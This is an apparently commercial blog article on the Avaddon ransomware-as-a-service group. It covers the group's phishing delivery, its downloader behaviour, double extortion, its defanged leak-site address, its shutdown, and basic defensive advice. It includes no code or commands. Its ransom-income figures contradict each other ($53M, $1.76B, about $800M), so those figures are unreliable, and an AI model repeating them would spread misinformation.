Avaddon was first seen in 2019 and distributed as a Ransomware as a Service (RaaS) for use in targeted attacks. The infection vector is phishing emails and Avaddon typically give affiliates a negotiable 65% of all ransoms.
Avaddon has accounted for nearly 24% of all ransomware incidents since the attack on Colonial Pipeline in May of this year and there is a lengthy list of prominent victims including Henry Oil & Gas, European insurance giant AXA, computer hardware company EVGA, software company Vistex, insurance broker Letton Percival, the Indonesian government’s airport company PT Angkasa Pura I, Acer Finance and healthcare organizations including Bridgeway Senior Healthcare in New Jersey, Capital Medical Centre in Olympia, Washington and others.
How Does It Work?
Avaddon is typically delivered via fairly unsophisticated phishing emails which employ obfuscation techniques. These emails have JPEG or zipped file attachments, which themselves contain a preliminary downloader in a .js payload.
Once run, the downloader detects whether the user is located in any member nations of the Commonwealth of Independent States (CIS) by checking the operating system language and keyboard layout. If either of these returns Russian or Ukrainian, it will terminate itself. The downloader use embedded versions of two Microsoft tools, PowerShell and BITS, to download and Avaddon payload from a command-and-control server and execute it. Some Avaddon campaigns use exposed Remote Desktop Service connections to directly deliver Avaddon payloads to target systems.
It is a crypto locker written in C++ that encrypts files and changes the file extension to .avdn. The ransomware also deletes the volume shadow copies and other system backups. Since the ransomware uses strong encryption algorithms like AES256 and RSA2048, no decryptor is available and it is impossible to decrypt the file without the key that was used to encrypt it.
Avaddo uses a double extortion scheme like DarkSide and REvil ransomware. Data is both encrypted locally and exfiltrated before the ransom demand is made. If the victim refuses to pay, their data is published to a site located on the dark web at avaddongun7rngel[dot]onion. Avaddon also subjects its victim to a third threat – a Distributed Denial of Service (DDoS) attack – until the ransom is paid.
Why did they stop?
Avaddon’s decision may be due to increased pressure and scrutiny by law enforcement and governments worldwide after recent attacks to critical infrastructure.
Avaddon’s average ransom demand was estimated to be around $600k. 88 companies admitted that they had been attacked which suggested a total income of around $53M. if we use the released 2,934 decryption keys as a guide the real figure may actually be as high as $1.76B as a staggering 97% of their victims did admit to an attack!
Avaddon may have made enough money (around $800M) to be ok financially to shut down, at least for a while, and maintain a low profile while law enforcement attention focus on other active gangs. Will they stay closed? It’s pretty typical that these gangs close up shop when things get a bit more challenging and then resurface at a later date so it’s probably very unlikely!
Lessons to learn…
Avaddon’s attacks were made possible by people getting fooled by very unsophisticated phishing campaigns which lead to them sharing information that enabled credential theft. It’s also due to poor IT management, as with Colonial pipeline which was down to a legacy Virtual Private Network (VPN) system that did not have multi-factor authentication in place. That means it could be accessed through a password without a second step such as a text message, a common security safeguard in more recent software.
In the vast majority of cases, it is not about ploughing a lot of money into sophisticated Cyber defence systems, it’s about doing the very basic things to make people more careful:
- Educate employees about the dangers of posting any information on social media that could be used in a social engineering attack.
- Don’t trust authentic or authentic-looking invitations, correspondences, and so on. Verify by phone or other means before opening anything that comes via email.
- Secure remote work sessions and work-from-home tools, and train against ever offering credentials requested on email.
- Develop training for executives, managers and other leaders about whaling attacks. Specifically, explain to them why they are most likely to be targets of very sophisticated social engineering attacks.
It’s really important to ensure your IT support team, or MSP, is applying very basic IT support practices effectively such as patching, securing and verifying local and off-site back-ups, looking for unusual activity (Ransomware attacks can be preceded by weeks or months of preparatory work to extract data and compromise back-ups).
Apply vendor security assessments regularly and do not just assume that your Cloud is secure, run assessments that the vendors usually freely provide to assess protections and apply the advice given free!
If you are not sure, or confident, then bring in someone to run an IT audit. It doesn’t have to be war and peace, but it should give you an idea on how exposed you may be and how best to address any risks.